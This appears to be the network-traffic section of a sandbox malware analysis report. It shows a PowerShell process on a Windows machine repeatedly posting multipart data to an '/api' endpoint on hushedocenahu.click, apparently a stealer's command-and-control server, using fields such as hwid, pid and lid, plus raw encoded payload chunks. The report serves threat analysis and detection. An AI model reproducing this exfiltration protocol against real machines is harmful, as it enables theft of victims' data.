                                                                                                                                  2024-12-25 14:10:35 UTC1369INData Raw: 50 49 61 5a 70 30 6f 45 4b 32 52 53 45 49 56 44 44 63 49 55 6f 70 44 70 31 36 74 74 38 35 2b 50 54 48 70 34 4d 4c 5a 70 4e 5a 2f 64 34 6a 68 44 4f 30 44 72 78 4f 5a 6c 38 52 63 35 56 69 54 44 74 48 79 54 57 51 31 69 44 2b 71 49 2f 6d 6e 55 35 79 33 31 37 38 6b 33 48 46 4f 72 4d 48 75 30 52 69 58 78 63 68 32 69 52 5a 49 77 71 62 5a 37 76 51 4c 76 2f 2b 32 4b 57 45 42 6d 43 54 53 2f 6e 54 4b 6f 35 36 39 30 4b 32 55 53 45 49 56 42 44 4d 4e 45 45 6b 43 34 64 2b 73 4e 67 39 2f 2b 4f 56 36 4d 49 52 62 49 34 5a 71 4d 55 35 6b 6a 32 6d 54 4b 67 4a 5a 6c 78 55 61 35 73 6b 51 69 55 41 6c 33 75 6a 33 69 33 39 2f 4e 79 76 68 67 68 6f 6e 31 33 30 31 43 79 47 4e 72 49 46 73 6b 5a 6c 57 52 6f 36 31 47 49 46 59 77 43 4a 4e 65 6d 62 43 75 6e 77 32 61 76 43 48 79 57 47 47
                                                                                                                                  Data Ascii: PIaZp0oEK2RSEIVDDcIUopDp16tt85+PTHp4MLZpNZ/d4jhDO0DrxOZl8Rc5ViTDtHyTWQ1iD+qI/mnU5y3178k3HFOrMHu0RiXxch2iRZIwqbZ7vQLv/+2KWEBmCTS/nTKo5690K2USEIVBDMNEEkC4d+sNg9/+OV6MIRbI4ZqMU5kj2mTKgJZlxUa5skQiUAl3uj3i39/Nyvhghon1301CyGNrIFskZlWRo61GIFYwCJNembCunw2avCHyWGG
                                                                                                                                  2024-12-25 14:10:35 UTC277INData Raw: 43 49 76 6c 61 38 57 6c 71 52 68 45 30 7a 57 42 2b 49 41 6d 66 63 71 65 62 4e 4d 32 39 6c 61 6d 59 51 44 4f 6d 51 4c 44 55 4a 63 56 69 2b 52 65 32 53 57 5a 4b 41 6a 54 58 4d 30 41 75 43 37 4e 36 74 73 30 6f 2f 66 44 45 72 38 34 4c 5a 74 38 58 73 4e 51 78 78 57 4c 35 4c 62 5a 66 59 6e 38 58 49 74 4a 69 42 57 4d 41 68 7a 58 70 6d 78 57 79 34 64 61 32 67 51 39 36 6f 52 6d 6f 79 68 66 46 4d 61 38 46 6f 55 70 33 57 78 6b 2f 79 68 77 4c 65 31 50 44 4a 2b 4f 4a 65 65 32 7a 79 70 6e 4d 51 47 72 66 41 63 6e 4b 61 5a 4e 36 34 56 44 2f 43 58 4d 51 54 48 4f 63 49 56 6b 78 41 5a 4a 6a 73 70 77 56 7a 4e 54 44 72 49 55 51 62 49 68 57 73 4a 31 70 69 6e 72 68 4f 2f 46 41 5a 6b 73 46 4a 64 59 79 54 47 4d 34 33 7a 57 70 6d 33 4f 79 78 74 61 6f 6a 41 64 39 6a 68 54 58 78 53
                                                                                                                                  Data Ascii: CIvla8WlqRhE0zWB+IAmfcqebNM29lamYQDOmQLDUJcVi+Re2SWZKAjTXM0AuC7N6ts0o/fDEr84LZt8XsNQxxWL5LbZfYn8XItJiBWMAhzXpmxWy4da2gQ96oRmoyhfFMa8FoUp3Wxk/yhwLe1PDJ+OJee2zypnMQGrfAcnKaZN64VD/CXMQTHOcIVkxAZJjspwVzNTDrIUQbIhWsJ1pinrhO/FAZksFJdYyTGM43zWpm3OyxtaojAd9jhTXxS
                                                                                                                                  2024-12-25 14:10:35 UTC1369INData Raw: 32 63 36 32 0d 0a 4f 41 4e 65 6d 4c 65 61 6d 6d 68 76 48 53 55 6e 54 52 51 4c 44 46 61 64 31 6f 39 30 4b 6a 43 54 6b 51 55 7a 44 4a 4d 45 30 67 45 5a 49 79 6a 2b 55 4d 36 50 37 54 73 5a 4d 2b 56 5a 68 44 2f 64 55 2b 6c 48 61 73 41 62 39 48 5a 6b 5a 55 66 5a 73 74 43 33 73 2b 30 54 33 78 35 47 57 79 36 35 58 2b 77 6a 56 6f 6b 56 66 33 78 54 6a 49 48 61 4d 50 74 31 35 77 45 46 70 7a 33 57 49 54 63 30 6e 52 63 61 43 62 63 36 4b 68 6a 76 50 52 56 7a 76 4e 52 72 37 4b 61 5a 4e 36 34 56 44 2f 43 58 4d 51 54 48 4f 63 49 56 6b 78 41 5a 4a 6a 73 70 77 56 7a 4e 33 53 6f 49 63 48 65 39 31 33 2b 38 63 75 78 58 54 35 44 66 45 52 57 42 42 63 63 2b 52 73 43 7a 74 48 79 54 57 45 32 43 58 38 39 4d 4f 33 7a 79 35 73 6d 56 7a 33 77 32 75 72 4d 61 30 46 38 51 63 68 56 6c 52
                                                                                                                                  Data Ascii: 2c62OANemLeammhvHSUnTRQLDFad1o90KjCTkQUzDJME0gEZIyj+UM6P7TsZM+VZhD/dU+lHasAb9HZkZUfZstC3s+0T3x5GWy65X+wjVokVf3xTjIHaMPt15wEFpz3WITc0nRcaCbc6KhjvPRVzvNRr7KaZN64VD/CXMQTHOcIVkxAZJjspwVzN3SoIcHe913+8cuxXT5DfERWBBcc+RsCztHyTWE2CX89MO3zy5smVz3w2urMa0F8QchVlR
                                                                                                                                  2024-12-25 14:10:35 UTC1369INData Raw: 44 45 56 6c 33 61 6e 32 47 7a 4d 7a 66 4b 6f 68 51 46 39 6a 30 37 2f 6e 41 65 7a 47 34 63 38 70 45 70 76 58 68 4d 6c 79 6d 49 46 59 77 6a 52 4c 59 69 62 59 37 4c 4d 6d 2b 61 61 51 44 50 66 62 50 50 64 4a 34 49 73 71 45 2b 57 52 32 5a 52 41 69 50 4d 4c 51 51 4e 4d 62 41 31 2f 35 73 74 73 71 75 48 36 4d 49 45 65 74 38 42 6f 49 46 79 30 47 6e 75 55 75 4e 57 4c 30 6c 55 4a 5a 74 36 47 57 31 48 67 7a 58 70 6d 32 7a 78 34 63 65 67 67 52 5a 6f 32 47 66 4f 39 43 65 43 4f 36 38 53 76 45 56 41 55 77 55 35 35 52 78 65 49 41 6d 66 63 71 66 4b 61 37 79 7a 32 75 62 61 4f 53 76 58 47 63 2b 64 61 5a 31 36 34 55 4b 45 53 6d 39 65 45 79 58 4b 62 32 77 74 41 4a 42 6a 6f 64 59 6e 30 2f 44 45 72 4d 4a 4f 4b 35 6b 5a 71 49 46 6e 78 54 36 6f 51 75 6b 5a 4d 77 74 42 59 49 78 79
                                                                                                                                  Data Ascii: DEVl3an2GzMzfKohQF9j07/nAezG4c8pEpvXhMlymIFYwjRLYibY7LMm+aaQDPfbPPdJ4IsqE+WR2ZRAiPMLQQNMbA1/5stsquH6MIEet8BoIFy0GnuUuNWL0lUJZt6GW1HgzXpm2zx4ceggRZo2GfO9CeCO68SvEVAUwU55RxeIAmfcqfKa7yz2ubaOSvXGc+daZ164UKESm9eEyXKb2wtAJBjodYn0/DErMJOK5kZqIFnxT6oQukZMwtBYIxy


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.449831104.21.112.14438032C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-25 14:10:37 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=LOQHJJY7E0F02RWXU
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 18158
                                                                                                                                  Host: hushedocenahu.click
                                                                                                                                  2024-12-25 14:10:37 UTC15331OUTData Raw: 2d 2d 4c 4f 51 48 4a 4a 59 37 45 30 46 30 32 52 57 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 35 45 38 33 36 43 32 36 37 33 34 32 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 4f 51 48 4a 4a 59 37 45 30 46 30 32 52 57 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 4f 51 48 4a 4a 59 37 45 30 46 30 32 52 57 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 37 0d 0a
                                                                                                                                  Data Ascii: --LOQHJJY7E0F02RWXUContent-Disposition: form-data; name="hwid"875E836C267342A3AC8923850305D13E--LOQHJJY7E0F02RWXUContent-Disposition: form-data; name="pid"2--LOQHJJY7E0F02RWXUContent-Disposition: form-data; name="lid"yJEcaG--singl7
                                                                                                                                  2024-12-25 14:10:37 UTC2827OUTData Raw: 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36
                                                                                                                                  Data Ascii: f5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
                                                                                                                                  2024-12-25 14:10:38 UTC1127INHTTP/1.1 200 OK
                                                                                                                                  Date: Wed, 25 Dec 2024 14:10:37 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=4kpbicb6hsmd3jl2usrvqk7608; expires=Sun, 20 Apr 2025 07:57:16 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OQNi%2BQIZmg5fWkbUs1ljDZX5UkXxRsOYhHDEYAxpqjim5iQtpmoygXI8nZyB9yF9koRhywCAyJ0dj8Df748xiFbAl%2FYxubhaRFCQL9G0aAsrXm6yvUeQlm4z1v8hgAYKfgfHYk0u"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f796a669d3b729f-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2005&rtt_var=764&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19122&delivery_rate=1422308&cwnd=169&unsent_bytes=0&cid=a9cd5ac010b80602&ts=963&x=0"
                                                                                                                                  2024-12-25 14:10:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                  2024-12-25 14:10:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.449837104.21.112.14438032C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-25 14:10:39 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=65U60J1U38
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 8737
                                                                                                                                  Host: hushedocenahu.click
                                                                                                                                  2024-12-25 14:10:39 UTC8737OUTData Raw: 2d 2d 36 35 55 36 30 4a 31 55 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 35 45 38 33 36 43 32 36 37 33 34 32 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 35 55 36 30 4a 31 55 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 35 55 36 30 4a 31 55 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 37 0d 0a 2d 2d 36 35 55 36 30 4a 31 55 33 38 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                  Data Ascii: --65U60J1U38Content-Disposition: form-data; name="hwid"875E836C267342A3AC8923850305D13E--65U60J1U38Content-Disposition: form-data; name="pid"2--65U60J1U38Content-Disposition: form-data; name="lid"yJEcaG--singl7--65U60J1U38Content
                                                                                                                                  2024-12-25 14:10:40 UTC1133INHTTP/1.1 200 OK
                                                                                                                                  Date: Wed, 25 Dec 2024 14:10:39 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=rvre5mkaub50qj7obuopauhr7h; expires=Sun, 20 Apr 2025 07:57:18 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E%2Bx%2Ftw2BKzKOgsQiGn7z9n4KoBVaSydI6OXRpFlPBgCG8pgEcGlFP8s9a99nRHdra8lixquwrktjS3XoE7%2B5FccSuM0o4jtK2%2BKias7A%2Ba4CUfStWPJ7%2FpVNmDbvR1IZ0NWIdVF6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f796a745b9ac34f-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1431&min_rtt=1420&rtt_var=555&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9671&delivery_rate=1932495&cwnd=181&unsent_bytes=0&cid=2e8f4da47b5944ef&ts=772&x=0"
                                                                                                                                  2024-12-25 14:10:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                  2024-12-25 14:10:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.449843104.21.112.14438032C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-25 14:10:41 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=9PD5G4RIDGD
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 20396
                                                                                                                                  Host: hushedocenahu.click
                                                                                                                                  2024-12-25 14:10:41 UTC15331OUTData Raw: 2d 2d 39 50 44 35 47 34 52 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 35 45 38 33 36 43 32 36 37 33 34 32 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 50 44 35 47 34 52 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 50 44 35 47 34 52 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 37 0d 0a 2d 2d 39 50 44 35 47 34 52 49 44 47 44 0d 0a 43 6f 6e
                                                                                                                                  Data Ascii: --9PD5G4RIDGDContent-Disposition: form-data; name="hwid"875E836C267342A3AC8923850305D13E--9PD5G4RIDGDContent-Disposition: form-data; name="pid"3--9PD5G4RIDGDContent-Disposition: form-data; name="lid"yJEcaG--singl7--9PD5G4RIDGDCon
                                                                                                                                  2024-12-25 14:10:41 UTC5065OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0
                                                                                                                                  Data Ascii: lrQMn 64F6(X&7~`aO@
                                                                                                                                  2024-12-25 14:10:42 UTC1127INHTTP/1.1 200 OK
                                                                                                                                  Date: Wed, 25 Dec 2024 14:10:42 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=hqd2h56umpmv09c92cqco2dou0; expires=Sun, 20 Apr 2025 07:57:20 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=je6CocuDhp%2FxbAC2MSX%2FAJmso6VQZvGZxgiUSNvO36JwaS2OlUKCP8PYD2nhKeiJPYbLZ8AdNFN8PVsgdIikZAsoiGIPWILRT5Eyo40Axp2Vlk2ZSz6JHCr935u49cwQHJf1jeMb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f796a813b99727b-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1933&rtt_var=728&sent=15&recv=27&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21354&delivery_rate=1510605&cwnd=232&unsent_bytes=0&cid=bc99aeef6b39de5a&ts=967&x=0"
                                                                                                                                  2024-12-25 14:10:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                  2024-12-25 14:10:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.449854104.21.112.14438032C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-25 14:10:43 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=RZOZ3PLVHX
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 1197
                                                                                                                                  Host: hushedocenahu.click
                                                                                                                                  2024-12-25 14:10:43 UTC1197OUTData Raw: 2d 2d 52 5a 4f 5a 33 50 4c 56 48 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 35 45 38 33 36 43 32 36 37 33 34 32 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 52 5a 4f 5a 33 50 4c 56 48 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 5a 4f 5a 33 50 4c 56 48 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 37 0d 0a 2d 2d 52 5a 4f 5a 33 50 4c 56 48 58 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                  Data Ascii: --RZOZ3PLVHXContent-Disposition: form-data; name="hwid"875E836C267342A3AC8923850305D13E--RZOZ3PLVHXContent-Disposition: form-data; name="pid"1--RZOZ3PLVHXContent-Disposition: form-data; name="lid"yJEcaG--singl7--RZOZ3PLVHXContent
                                                                                                                                  2024-12-25 14:10:44 UTC1122INHTTP/1.1 200 OK
                                                                                                                                  Date: Wed, 25 Dec 2024 14:10:44 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=6qvduiil95e856niemvlct2jjv; expires=Sun, 20 Apr 2025 07:57:23 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G1XZIg33okyu3YiIRKYWKaBpmZi3wvJ1r3Wyxkekm0eVTTXLTuxWT5GaO0S2itM4RoWWmu4PMXroL3aSPCubWI7H31Hr07oXllr%2BDWrJcjoMfecrVv4MA9FZf2IDt52uaoNRPZNK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f796a902ab20f5b-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1650&rtt_var=632&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2109&delivery_rate=1712609&cwnd=218&unsent_bytes=0&cid=659af063c580da5a&ts=774&x=0"
                                                                                                                                  2024-12-25 14:10:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                  2024-12-25 14:10:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  8192.168.2.449860104.21.112.14438032C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-25 14:10:45 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=BWW3KGT6
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 570992
                                                                                                                                  Host: hushedocenahu.click
                                                                                                                                  2024-12-25 14:10:45 UTC15331OUTData Raw: 2d 2d 42 57 57 33 4b 47 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 35 45 38 33 36 43 32 36 37 33 34 32 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 57 57 33 4b 47 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 57 57 33 4b 47 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 37 0d 0a 2d 2d 42 57 57 33 4b 47 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                                                  Data Ascii: --BWW3KGT6Content-Disposition: form-data; name="hwid"875E836C267342A3AC8923850305D13E--BWW3KGT6Content-Disposition: form-data; name="pid"1--BWW3KGT6Content-Disposition: form-data; name="lid"yJEcaG--singl7--BWW3KGT6Content-Disposi
